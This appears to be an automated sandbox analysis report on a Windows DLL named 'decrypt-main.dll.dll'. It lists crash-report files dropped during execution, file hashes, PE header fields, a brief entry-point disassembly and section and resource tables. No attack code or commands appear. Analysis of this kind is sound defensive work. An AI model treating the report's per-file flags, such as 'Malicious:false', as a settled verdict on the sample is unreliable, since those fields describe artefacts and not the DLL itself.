                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.7.5.6.<./.P.i.
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4788
                  Entropy (8bit):4.50536706303624
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsXJg771I98nWpW8VYZYm8M4JC2CU6Fhcyq85mcxWptSTSsd:uIjf5I73W7VJJ5sWpoOsd
                  MD5:21AA7917931AFA014E3553A5455D49C2
                  SHA1:AE00E3F1032701317BF4E43A0F85A4786458FEF3
                  SHA-256:B6ADE658C07F63295A5BBFFE21518CF3702BB8DDDA72C7C581BF12135309E0AD
                  SHA-512:A134863F99CC4B301B155C680629C7B7D4BDDA99073193E7EC96220248141EC663622EF155FE2C0C7A9B75BDCBB9A510682FDABE5465160E2AD4FBE4A55CE71C
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233704" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Mar 13 16:01:25 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):70812
                  Entropy (8bit):1.5692295042160604
                  Encrypted:false
                  SSDEEP:192:G8/3G5NPQQtXOM6MHlE6ss1t4hm2y56bEvw3ZfmOPFHg5PQt5b8d:D25lQQonMHlE6ss/eVmOPa5PO4
                  MD5:C43A2CC32EBEE32B578A2A821875327C
                  SHA1:F237A11EBE05C0BEA4FC5CA42F1B62E2C1F56737
                  SHA-256:1E170FA9881962697DA90D3BB6570C347D60F4E323E39F8D098A90DF75A984D9
                  SHA-512:0F4919B6327EC5FB937D7CD891A595A07900175B2F40495D5C9A8C87C5207C2E23315A7DE8D03906459A23A03B97313062BD8AC62CD4457D68E5F2065D56843E
                  Malicious:false
                  Preview:MDMP..a..... ..........e....................................$...~3..........T.......8...........T...........................P...........<...............................................................................eJ..............Lw......................T..............e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8986
                  Entropy (8bit):3.7027868828474215
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJclaPe6YjvmHgmf3rWFvTprO89buECf36m:R6lXJuaPe6YjmHgmf3rWFBupfb
                  MD5:1800297F9C73CA0EA1ABE0843F926951
                  SHA1:50DE789B56AB3CC66269F7DDA54DA277A61C92E3
                  SHA-256:88AB867B617604B34862CF1551B48DFCC17F96985CF883934FA497F6E97F347F
                  SHA-512:58F4432C0C13397788A3DFEA8A8EC7F184EF9331147B2E7DD8C3C70D1F0F278706FD12C1C9839E65A3E2A729E53DDBB91DD99E43838CCBFC433A430D948E26AE
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.7.2.<./.P.i.
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4784
                  Entropy (8bit):4.482119788685306
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsXJg771I98nWpW8VYiYm8M4JC2CUKFtyq85mQexptSTSxd:uIjf5I73W7VyJy9xpoOxd
                  MD5:1E73CDF4B2014414B98D87159C136466
                  SHA1:BE515FF804A463832779C7B8FFE4AA53779AFEE3
                  SHA-256:F1E02908BC88E9B32BF6DBCB240A1B14DC264CBC1C264CBE9A2382BB348BED52
                  SHA-512:6A69C055C3FC29045FF8D1534E2955FF4DDFAE98659F79CF2BBA316060CC064D78B5C9C12D6031E946F5F421BFDE9447C9F5D666CBF5BDF5117A7CBEB8A95EE9
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233704" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Mar 13 16:01:28 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):61372
                  Entropy (8bit):1.6756530960994802
                  Encrypted:false
                  SSDEEP:192:Hq4CXqkUup/4OMdM499HSddfGduA0ENksckYHismDaHiFMEqz5OC/:KPXNUupgM69ATmDatBVOW
                  MD5:00CAE3143F69C76F94BBF8D7DEA44FCC
                  SHA1:AE52379B006B8F8864525735DE52720165836E18
                  SHA-256:2F12CF8949E6CBA0A38EFDBBE61D5FF660635AC22008FFAF46AF98681202EC2A
                  SHA-512:9816F04003CA21F1B23E6D6BA443F69FF2BBAADEC8175DF7656319AF4013852382DAC14A87D8EEC60DD3DE3FC1D525184E792CB6A898A3B1497135DB5FA7FD76
                  Malicious:false
                  Preview:MDMP..a..... ..........e........................................~...........T.......8...........T........................... ...........................................................................................eJ..............Lw......................T.......t......e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):9006
                  Entropy (8bit):3.702694951219571
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJwD9u3g6YjDl+MNgmf3rWFvTprB89bbnCfnJm:R6lXJU9u3g6Yvl+MNgmf3rWFIbCfk
                  MD5:3C2A36D680AB34330AF96A1F977469F1
                  SHA1:40C3E6F3845161F1BC81898FC2604D0BEA352324
                  SHA-256:95F7AEE090A233A67320BCC3DC40D295259557947758D0D1F426ED7583373FBF
                  SHA-512:D87E8992817FC5B2B24FD9CEBFF532B686BCEBCE07C38CD56873DDB837710423FF48623EF63FAC1EA519239757D96A2BCFABC149ACB24D7483D61E9D740A3F0F
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.2.8.<./.P.i.
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4784
                  Entropy (8bit):4.485551881260071
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsXJg771I98nWpW8VYpYm8M4JC2CUKFJ7yq85mQNptSTSQd:uIjf5I73W7V9JO+poOQd
                  MD5:1FA5F96464C95C1B89419DD8C6DC4613
                  SHA1:9B0ACE800C8A3F6557C6A5C8DEAF14DFF991ABE5
                  SHA-256:7B9577F8C6829676AF0561636074F79A998460C809E0E5C004681F2F48BD787E
                  SHA-512:2831545F38427D43A61DD2EC7EE4B38636FBC119A0BBE142FB0ED895519945D58720760F981C1D56071C7D56086E7DD139D21895976C0E5F4F9D87B270D09147
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="233704" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\System32\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1835008
                  Entropy (8bit):4.469524156333331
                  Encrypted:false
                  SSDEEP:6144:UzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNMjDH5S:aZHtYZWOKnMM6bFpaj4
                  MD5:6ACFB84F3F9E763CC9A22DEA3DCE603C
                  SHA1:62AED76D34EAA0E5CF43C888753E6F7EF82BEB2B
                  SHA-256:8042A5C3B3E6FAA6EC04D1014FBC4B3A49E6095F8E68A0AE13BE9430025B3566
                  SHA-512:A3E96F0238569F824B3CBA0A79673618E1FC8B4F0FB4E09E958833DCF0DF377EB638FE021DE3EE16A65FB6D444F0888340DDD4C393F5C2A6726EE93CA58F3EFD
                  Malicious:false
                  Preview:regfK...K....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&.._u........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                  Entropy (8bit):5.979646090579889
                  TrID:
                  • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                  • Win64 Executable (generic) (12005/4) 10.17%
                  • Generic Win/DOS Executable (2004/3) 1.70%
                  • DOS Executable Generic (2002/1) 1.70%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                  File name:decrypt-main.dll.dll
                  File size:5'330'944 bytes
                  MD5:1715ba4aa4ff4c70e66943076f3236ac
                  SHA1:f57bfbe116f915e5525c5eff36b5eb5969282171
                  SHA256:faebf87c3ff1345bbd5910fe4633b2b49dc83fe62b400ecaa102594d5edb39f0
                  SHA512:ad06e05a1cdc6a92af67c8b96ff708bb92e25e5b021478c7e7f1df13eca9223d107f1de9467d1d24efcf831602ab816d491e68d37b98883b8410642583f7ef48
                  SSDEEP:49152:5DEhDXc+rWZtaJ8CifXdpbnaSl+lcOFo66bJeaE3g6XGTkN6h:5WUaJri/zfTsRq
                  TLSH:233639BB76A482A9C16EC13ED0E38F00D933B1B61733C6E7629143652E469D46F3F661
                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                  Icon Hash:7ae282899bbab082
                  Entrypoint:0x8167d0
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                  DLL Characteristics:
                  Time Stamp:0x65E92BED [Thu Mar 7 02:52:29 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:2
                  File Version Major:5
                  File Version Minor:2
                  Subsystem Version Major:5
                  Subsystem Version Minor:2
                  Import Hash:e015ba11e1ddaa5380318c50a8051d1f
                  Instruction
                  push ebp
                  dec eax
                  sub esp, 00000180h
                  dec eax
                  mov ebp, esp
                  dec eax
                  mov dword ptr [ebp+30h], ecx
                  mov dword ptr [ebp+3Ch], edx
                  dec esp
                  mov dword ptr [ebp+40h], eax
                  nop
                  dec eax
                  lea ecx, dword ptr [ebp+48h]
                  call 00007FDD90EB2F65h
                  cmp eax, 01h
                  setle cl
                  dec eax
                  movzx ecx, cl
                  mov dword ptr [ebp+0000017Ch], ecx
                  test eax, eax
                  jne 00007FDD912B9FA2h
                  dec eax
                  lea ecx, dword ptr [ebp+48h]
                  dec eax
                  lea edx, dword ptr [00000051h]
                  dec esp
                  mov eax, dword ptr [ebp+30h]
                  inc esp
                  mov ecx, dword ptr [ebp+3Ch]
                  dec eax
                  mov eax, dword ptr [ebp+40h]
                  dec eax
                  mov dword ptr [esp+20h], eax
                  call 00007FDD90EBD580h
                  jmp 00007FDD912B9F7Ah
                  nop
                  nop
                  call 00007FDD90EB2787h
                  nop
                  call 00007FDD90EB3081h
                  mov eax, dword ptr [ebp+0000017Ch]
                  dec eax
                  lea esp, dword ptr [ebp+00000180h]
                  pop ebp
                  ret
                  dec eax
                  lea eax, dword ptr [eax+00h]
                  dec eax
                  lea eax, dword ptr [00000000h+eax]
                  dec eax
                  sub esp, 28h
                  call 00007FDD90EB268Ch
                  dec eax
                  add esp, 28h
                  ret
                  add byte ptr [eax], al
                  enter 0000h, 00h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  nop
                  push 00000081h
                  add byte ptr [eax], al
                  jnc 00007FDD912B9F8Ch
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  adc byte ptr [ebp-7Fh], dh
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [ebx+00h], dh
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  test al, 48h
                  add byte ptr [eax], 00000000h
                  add byte ptr [eax], al
                  add byte ptr [eax-54h], ah
                  inc ecx
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x49b0000xcc.edata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x4940000x5134.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x5130000x13400.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x4d40000x3e160.pdata
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x49d0000x36e34.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x4955000x1308.idata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x49a0000xf2a.didata
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x423f700x424000b7f27458062548a6937770656e7e3fc1unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data0x4250000x626200x628009a2bac6930b172b6685b28ba442630cdFalse0.26204344463832485data4.902591015474462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .bss0x4880000xbf9c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata0x4940000x51340x5200703a5e532c59ee1f8016d0490c2480cdFalse0.2421875data4.251729395494642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .didata0x49a0000xf2a0x1000c373d4d2586c9b286933e221aadd59bcFalse0.253662109375data3.24473098416006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .edata0x49b0000xcc0x20009500bfbbf513ed005e4bb6dff2efa39False0.345703125data2.4492227742982298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rdata0x49c0000x440x200c8956fe83c39059a06fbaa227b86bb22False0.15625data1.1709274092963795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x49d0000x36e340x37000099680a7bdd7617d15c3ab408e1cbd03False0.46367631392045455data6.45364680864244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  .pdata0x4d40000x3e1600x3e200fb0adaccc8febc7d9f0cb5f536122620False0.4902186556841046data6.396233810440188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .rsrc0x5130000x134000x13400bb501744d3457770d2c2e99247451795False0.24665178571428573data5.0560496894268265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_CURSOR0x51432c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                  RT_CURSOR0x5144600x134dataEnglishUnited States0.4642857142857143
                  RT_CURSOR0x5145940x134dataEnglishUnited States0.4805194805194805
                  RT_CURSOR0x5146c80x134dataEnglishUnited States0.38311688311688313
                  RT_CURSOR0x5147fc0x134dataEnglishUnited States0.36038961038961037
                  RT_CURSOR0x5149300x134dataEnglishUnited States0.4090909090909091
                  RT_CURSOR0x514a640x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                  RT_BITMAP0x514b980x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                  RT_BITMAP0x514d680x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                  RT_BITMAP0x514f4c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                  RT_BITMAP0x51511c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                  RT_BITMAP0x5152ec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                  RT_BITMAP0x5154bc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                  RT_BITMAP0x51568c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                  RT_BITMAP0x51585c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                  RT_BITMAP0x515a2c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                  RT_BITMAP0x515bfc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                  RT_BITMAP0x515dcc0x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.391304347826087
                  RT_BITMAP0x515e280x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.532608695652174
                  RT_BITMAP0x515e840x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.4782608695652174
                  RT_BITMAP0x515ee00x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.5543478260869565
                  RT_BITMAP0x515f3c0x5cDevice independent bitmap graphic, 6 x 11 x 1, image size 44EnglishUnited States0.4673913043478261
                  RT_BITMAP0x515f980x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.328042328042328
                  RT_BITMAP0x5164080x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.3289241622574956
                  RT_BITMAP0x5168780x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.40476190476190477
                  RT_BITMAP0x516ce80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.09435626102292768
                  RT_BITMAP0x5171580x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.23721340388007053
                  RT_BITMAP0x5175c80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.29188712522045857
                  RT_BITMAP0x517a380x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.1675485008818342
                  RT_BITMAP0x517ea80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.2892416225749559
                  RT_BITMAP0x5183180x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.2751322751322751
                  RT_BITMAP0x5187880x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.30776014109347444
                  RT_BITMAP0x518bf80x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.2777777777777778
                  RT_BITMAP0x5190680x46eDevice independent bitmap graphic, 28 x 13 x 24, image size 1094, resolution 2834 x 2834 px/mEnglishUnited States0.41887125220458554
                  RT_STRING0x5194d80x624data0.3333333333333333
                  RT_STRING0x519afc0xb3cdata0.2437413073713491
                  RT_STRING0x51a6380x22cdata0.4172661870503597
                  RT_STRING0x51a8640x33cdata0.43719806763285024
                  RT_STRING0x51aba00x488data0.32413793103448274
                  RT_STRING0x51b0280x508data0.2694099378881988
                  RT_STRING0x51b5300x494data0.40017064846416384
                  RT_STRING0x51b9c40x3dcdata0.3248987854251012
                  RT_STRING0x51bda00x358data0.4485981308411215
                  RT_STRING0x51c0f80x404StarOffice Gallery theme l, 1677731072 objects, 1st l0.41245136186770426
                  RT_STRING0x51c4fc0xa0data0.7125
                  RT_STRING0x51c59c0xe4data0.6359649122807017
                  RT_STRING0x51c6800x2c4data0.4138418079096045
                  RT_STRING0x51c9440x254data0.4865771812080537
                  RT_STRING0x51cb980x3d0data0.3698770491803279
                  RT_STRING0x51cf680x3b8data0.3760504201680672
                  RT_STRING0x51d3200x47cdata0.3423344947735192
                  RT_STRING0x51d79c0x38cdata0.3634361233480176
                  RT_STRING0x51db280x2c4data0.3559322033898305
                  RT_STRING0x51ddec0x3f8data0.39173228346456695
                  RT_STRING0x51e1e40x524data0.3844984802431611
                  RT_STRING0x51e7080x4acdata0.31605351170568563
                  RT_STRING0x51ebb40x3b0data0.3707627118644068
                  RT_STRING0x51ef640x39cdata0.32142857142857145
                  RT_STRING0x51f3000x40cdata0.3735521235521235
                  RT_STRING0x51f70c0xf4data0.5491803278688525
                  RT_STRING0x51f8000xc4data0.6275510204081632
                  RT_STRING0x51f8c40x268data0.48863636363636365
                  RT_STRING0x51fb2c0x434data0.3308550185873606
                  RT_STRING0x51ff600x360data0.38425925925925924
                  RT_STRING0x5202c00x2ecdata0.37566844919786097
                  RT_STRING0x5205ac0x31cdata0.34296482412060303
                  RT_RCDATA0x5208c80x10data1.5
                  RT_RCDATA0x5208d80x7c8data0.5281124497991968
                  RT_RCDATA0x5210a00x2dataEnglishUnited States5.0
                  RT_RCDATA0x5210a40xc45Delphi compiled form 'TFJustificativa'0.3081821076090417
